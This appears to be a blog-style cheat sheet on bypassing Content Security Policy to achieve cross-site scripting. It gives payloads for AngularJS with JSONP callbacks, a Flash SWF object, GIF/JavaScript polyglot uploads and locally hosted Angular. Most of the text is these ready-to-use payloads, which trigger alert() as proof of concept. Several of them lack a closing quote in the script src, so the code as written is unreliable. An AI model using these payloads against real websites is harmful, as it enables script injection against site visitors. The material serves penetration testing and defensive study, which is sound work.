- CSP can be implemented via
- Response header
- Meta tag
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
Bypass CSP via ajax.googleapis.com
- via Flash file
- via Polyglot file
- via AngularJS
Bypass CSP via ajax.googleapis.com
Check `Content-Security-Policy: script-src 'self' ajax.googleapis.com`
- here script-src 'self' ajax.googleapis.com means -> it allows only the same domains scripts + ajax.googleapis.com scripts
<div ng-app ng-csp id=p ng-click=$event.view.alert("XSS")><script src="//ajax.googleapis.com/ajax/libs/angular/1.6.6/angular.min.js></script> <script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>
Bypass CSP via Flash File
Works if the CSP is `Content-Security-Policy: script-src 'self'`; when the only restriction is script- we can bypass it using Flash File
<object type='application/x-shockwave-flash' data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\%22})))}catch(e) {alert(/XSS/)}//'><param name='AllowScriptAccess' Value='always'></object>
Bypassing CSP via GIF file
Works if the CSP is `Content-Security-Policy: default-src 'self'`; - Which means all the files should be located in the same domain as the host
- Upload a gif to the target if it has a file upload feature
- Gif file should have a javascript inside it ; make GIF89a as a variable
- GIF89a= 'some GIF data'; alert(document.domain);/*
<script src=GIF_FILE_PATH> </script>
Bypassing CSP via AngularJS
Works if the CSP is `Content-Security-Policy: default-src 'self'; img-src images.local` - Which means all the accept images only from images.local (kind of like a sandbox domain)
This works only if the required libraries are hosted on the target - images.local in this case.
#AngularJS + callback
<div ng-app ng-csp id=p ng-click=$event.view.alert("XSS")><script src="angular-1.6.6.min.js></script> <script async src='/rfd/api/shop/product/id/1?format=json&callback=p.click'></script>
#Angular
<script src="angular-1.6.6.min.js></script><div ng-app ng-csp id=p ng-mouseover=$event.view.alert("XSS")><br/>(Move your mouse over this element)<br/></div>
More at https://github.com/bhaveshk90/Content-Security-Policy-CSP-Bypass-Techniques
Comments
Post a Comment